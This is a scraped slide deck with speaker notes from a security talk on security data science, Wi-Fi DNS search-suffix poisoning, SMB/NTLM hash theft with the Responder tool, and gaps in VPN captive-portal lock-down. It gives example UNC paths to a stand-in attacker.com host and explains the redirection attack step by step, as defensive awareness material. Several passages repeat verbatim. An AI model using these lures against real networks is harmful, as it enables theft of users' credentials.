TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
Confusing the myths with some facts
1. 11/13/2019 1
T: +44 (0)1622 723400 | E: info@secdata.com | W: www.secdata.com
CONFUSING THE
MYTHS WITH SOME
FACTS
by Charl Van Der Walt
@charlvdwalt
4. 11/13/2019 4
WHO’S ASKING THE QUESTIONS, FOR YOU?
A journey through our own data to question simple truths we take for
granted. In this presentation we will share the answers to selected questions
we’ve asked ourselves about our own data and explain how we went about
answering them and what they ultimately taught us. None of it is rocket
science and most of it is sadly unsurprising, but all of it is clean, sincere,
authentic and honest.
Security Data Science in its most juvenile form.
8. 11/13/2019 8
How efficient is Threat Intelligence about
the behaviour of an IP in predicting future
behaviour by that same IP?
But does it work
?
9. 11/13/2019 9
Precision.
𝑷 𝒄𝒐𝒓𝒓𝒆𝒄𝒕𝒍𝒚 𝒑𝒓𝒆𝒅𝒊𝒄𝒕𝒆𝒅 = 𝟏 𝒐𝒃𝒔𝒆𝒓𝒗𝒆𝒅 = 𝟏)
Given that a specific IP is given to be acting suspiciously
by a Threat Intelligence source, what is the probability
that the IP will be observed acting suspiciously again
later?
Threat
Intelligence Lab
Our T.I. petri dish
environment
Honeynet Lab
Our honeynet petri
dish environment
3.59%
14.73%
12. 11/13/2019 12
The curious incident of the outbound 445
IP address on the InternetTwo employees at a hotel
• Traffic send in the morning
within one hour of each
other
• Same hotel and same
complimentary Wi-Fi
• Just before the VPN
connected
13. 11/13/2019 13
SMB Port 445
• Server Message Block (SMB) protocol
• Windows uses it to share files, printers and serial ports
• NTLM authentication is used
• Windows wants to make your life easy
• This can be used to steal NTLM challenge-response
password hashes from SMB clients
• Attackers can trick a target into connecting to their SMB
server
• UNC paths in websites, documents, phishing emails etc
• For example:
• attacker.comshare-namefile.txt
• file://///attacker.com/share/folder/file.txt
16. 11/13/2019 16
domain.com, in the lounge, with a candle stick
“Connection specific suffix can be configured manually in the interface
properties or distributed dynamically through DHCP IP address assignment of
DHCP option 15”
19. 11/13/2019 19
Responder is a LLMNR, NBT-NS and MDNS poisoner, with
built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication
server supporting NTLMv1/NTLMv2/LMv2, Extended
Security NTLMSSP and Basic HTTP authentication.“
33. 11/13/2019 33
Lock down mode is designed to prohibit network communication
outside of the VPN Tunnel when the … client is attempting to
create a VPN connection to the … Connect Secure device.“
51. 11/13/2019 51
• The desktop is the target
• Direct access to user data
• The desktop is the user
• Inherited privileges on other systems
• Easy access to domain credentials
• Direct access to user location, video and audio
• The desktop is a foothold
• Ideal location for lateral movement and pivoting
• Numerous channels for exfiltration
• Excessive event data makes monitoring hard
• The desktop is a soft target
• The desktop is a big target
• User behaviour creates complex human-
machine system
• Directly accessible from the Internet!
53. 11/13/2019 53
While most enterprises assume that the internal network is a safe environment in
which to expose corporate applications, Google’s experience has proven that this
faith is misplaced. Rather, one should assume that an internal network is as
fraught with danger as the public Internet and build enterprise applications based
upon this assumption.
54. 11/13/2019 54
KNOW who You Are
KNOW your Footprint
KNOW your Threat Model
KNOW your Vulnerabilities
KNOW how you react under assault
KNOW that something happened
KNOW what happened
KNOW what you’re going to do next
To do my job I have a lot of data. Between two dedicated research units, one of the worlds acclaimed Attack & Penetration Testing teams, a Managed Vulnerability Scanning Service and a Managed SIEM Service that collects, stores and analyses millions of customer security logs a day, we have the unique privilege of being able to look deep into the data to understand where our customers are vulnerable, how they’re being attacked and where the attackers are being successful.
But in truth we never really do that, do we? As an industry we’re much too busy shouting each other down, inventing new acronyms or designing logos for our branded vulnerabilities to earnestly test our dearly held preconceptions about the ‘truths’ in our space.
A while back I was debating with my team whether we should inform customers about an iOS exploit we were tracking. There was a strong argument that the effort would be wasted because iOS is ‘automatically’ patched. Instead of just arguing about it, we decided to test. Three million User Agents, endless struggles with Hadoop, Drill, Python & Excel and untold hours on the web followed, but finally we had a result:
Almost 80% of iOS iOS devices analysed are consistently patched to the latest levels, but almost 20% are still vulnerable to all the bugs and exploits publicly disclosed since September 2017.
So this is basically how it works – it’s a very practical and simple variant of a DNS spoofing ‘attack’, trivial to execute by anyone who owns or controls the Wifi AP, whether deliberately or by accident:
Victim gets IP configuration detail assigned by the Wifi API, including DNS server & domain search suffix
Client requests the IP address of a site or server by name
The response comes from the DNS server assigned by the Wifi API. Or alternatively the search domain which results in the DNS query comes from the Wifi API. Either way, the Wifi API controls DNS, which directs all connectivity
Therefore any TCP connection can be redirected to a potentially malicious server by the access point manipulating the DNS responses. That malicious server could be on the Internet (as with the case we originally investigated) or could be located on the LAN, or even on the AP itself.
A classic and simple way to exploit this systemic vulnerability is via a SMB ‘responder’ attack
We started to test the behaviour on other networks we use … and immediately spot exactly the same behaviour. This time there is no DNS wildcard so there is no immediate risk, but the fundamental condition is the same – DNS requests for unqualified host names with domain search suffices defined by the Wifi AP appended.
Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
This tool is first an LLMNR and NBT-NS responder, it will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answers to File Server Service request, which is for SMB. The concept behind this, is to target our answers, and be stealthier on the network. This also helps to ensure that we don’t break legitimate NBT-NS behavior. You can set the -r option to 1 via command line if you want this tool to answer to the Workstation Service request name suffix.
There are many ways in which we mitigate against a ‘responder’ class of threat, including personal firewalls and EDP/R systems (which is what ultimately saved SecureData) but the primary defensive mechanism when using untrusted networks is the VPN.
The basic principle is that the VPN encrypts and tunnels all outbound traffic as it leaves the client and ‘drops’ it in a safe location (e.g. in the corporate network). A virtual network device is created on the client where trusted DNS servers can be configured.
This protects against a rogue DNS server whilst also protecting the privacy of data traversing the network.
* Not sure whether this mitigates against rogue DNS search suffices – IT DOESN’T
But here’s the thing. I spend much of life travelling and I’m therefore almost always of 3rd party Wifi networks. We have numerous corporate VPN solutions to cater for this that provide access control and confidentiality.
But I get to wondering … what about this? When I need to interact with a captive portal of some kind I am connected to the Wifi network but not to the Internet. The VPN tunnel can’t established and so it can’t offer me any protection. I’m vulnerable to both DNS and network Attacker in the Middle risks.
With a captive portal in play I remain ‘trapped’ on the Wifi LAN until I’ve finished interacting the portal. Until that’s done and I (hopefully) have full internet access I am vulnerable to both DNS and network manipulation of my traffic, plus snooping of any network traffic my device emits.
This interaction captures that state. The OS and various applications all try determine whether they have internet access by connecting to known internet resources, as long as they receive the redirect to a another site the machine knows that its connected to the WLAN, but not to the Internet.
This is how it looks when internet connectivity is established. Instead of a 302 we get a 200 with the content that should be d
Here’s an example of a very simple and innocent privacy violation – the domain name of my machine plus any other machine account information being broadcast onto the local network for anyone to see. My VPN connection is not yet established, so it doesn’t prevent this
Because all my traffic outbound traffic is being ‘captured’ by the captive portal behaviour, any applications attempting to connected outward and deploying SSL/TLS report security exceptions. The server they are communicating with on the network cannot (theoretically at least) present the expected cryptographic certificate and therefore they either warn me, prompt me or simply fail
The same is true when I’m using a mobile phone.
So at this point the only thing protecting my traffic and defending me from attacker-in-the-middle and credential stealing attacks launched on the internal network via the wifi AP or the captive portal is the enforcement of SSL / TLS by the individual pages or apps on the mobile. The problem is … these are completely beyond our control.
Here are some examples of services that would behave like this. One can see cloud services, enterprise internet services and internal services all being requested. The response to those requests at this point is fully under the control of the Wifi AP.
One response to mitigating this threat is via the use of VPN ‘lock down’ or ‘Captive Portal Mitigation’, which is available in many VPN products. The idea is that the VPN blocks all outbound connections and then uses its own built-in browser to negotiate the captive portal until Internet connectivity can be established and the VPN built.
https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB40363
https://docs.pulsesecure.net/WebHelp/PDC/9.0R1/Content/PDC_AdminGuide_9.0R1/Captive_Portal_Remediation.htm
Lock-down mode prevents external browsers from communicating before the VPN is established, so external browsers cannot be used for captive-portal remediation with lock-down mode enabled. The embedded browser is the only option for remediating a captive portal in lock-down mode.
Here we see the Lock Down in action. Notice how the outbound ping is blocked until after the portal is negotiated and the VPN established
Problem is – DNS traffic is still allowed. And that’s not all.
https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB40363
https://docs.pulsesecure.net/WebHelp/PDC/9.0R1/Content/PDC_AdminGuide_9.0R1/Captive_Portal_Remediation.htm
It seems lock-down mode is designed to block 'traditional' outbound internet connections, but not a lot of discovery stuff (like DNS and MDNS) or 'internal' stuff like SMB.
In other words … Responder type attacks are *still* possible, even with ‘Lock Down’ mode enabled.
Lock-down mode prevents external browsers from communicating before the VPN is established, so external browsers cannot be used for captive-portal remediation with lock-down mode enabled. The embedded browser is the only option for remediating a captive portal in lock-down mode.
Activating a mapped drive initiates the SMB connection we see below. Note that the malicious Responder server is located interal to the LAN in this case.
There’s another problem – even once established the VPN is fully protecting us against Responder type attacks, unless there are also other mitigations in place.
Here’s what happens when the Internet connection is established and the VPN finally kicks in. Note the DNS lookup for our VPN gateway server, which is successfully resolved.
We see the TCP connection being established to the gateway and the correct certificate being presented. Then we can see the TCP stream that represents the VPN tunnel
Scarily – even after the VPN is established – if the DNS search suffix is not specifically configured – DNS search suffices can still be used to poison DNS requests, direct them at malicious name servers and resolve valuable internal resources to malicious hosts for responder or other AiTM attacks
There’s another problem – even once established the VPN is fully protecting us against Responder type attacks, unless there are also other mitigations in place.
Here’s what happens when the Internet connection is established and the VPN finally kicks in. Note the DNS lookup for our VPN gateway server, which is successfully resolved.
We see the TCP connection being established to the gateway and the correct certificate being presented. Then we can see the TCP stream that represents the VPN tunnel
There’s another problem – even once established the VPN is fully protecting us against Responder type attacks, unless there are also other mitigations in place.
Here’s what happens when the Internet connection is established and the VPN finally kicks in. Note the DNS lookup for our VPN gateway server, which is successfully resolved.
We see the TCP connection being established to the gateway and the correct certificate being presented. Then we can see the TCP stream that represents the VPN tunnel
Normalised – to remove double audits.
Only lowercase alpha = 2194 (0.48%)
Only uppercase alpha = 41 (0.01%)
Only alpha = 2235 (0.49%)
Only numeric = 301 (0.07%)
First capital last symbol = 47341 (10.43%)
First capital last number = 259236 (57.1%)
There’s another problem – even once established the VPN is fully protecting us against Responder type attacks, unless there are also other mitigations in place.
Here’s what happens when the Internet connection is established and the VPN finally kicks in. Note the DNS lookup for our VPN gateway server, which is successfully resolved.
We see the TCP connection being established to the gateway and the correct certificate being presented. Then we can see the TCP stream that represents the VPN tunnel
There’s another problem – even once established the VPN is fully protecting us against Responder type attacks, unless there are also other mitigations in place.
Here’s what happens when the Internet connection is established and the VPN finally kicks in. Note the DNS lookup for our VPN gateway server, which is successfully resolved.
We see the TCP connection being established to the gateway and the correct certificate being presented. Then we can see the TCP stream that represents the VPN tunnel
https://beyondcorp.com/
When a highly sophisticated APT attack named Operation Aurora occurred in 2009, Google began an internal initiative to reimagine their security architecture with regards to how employees and devices access internal applications.
16. These are the key elements of self-knowledge we believe on should seek to achieve. Each of these conveniently map to a specific practice the security team can undertake:
Identify and Authentication
Footprinting
Threat Modeling
Vulnerability Discovery
Objective-based penetration testing or red / purple teaming
Honeypots, tokens and other traps
Detection and Threat Hunting
Response, documented and regularly practiced.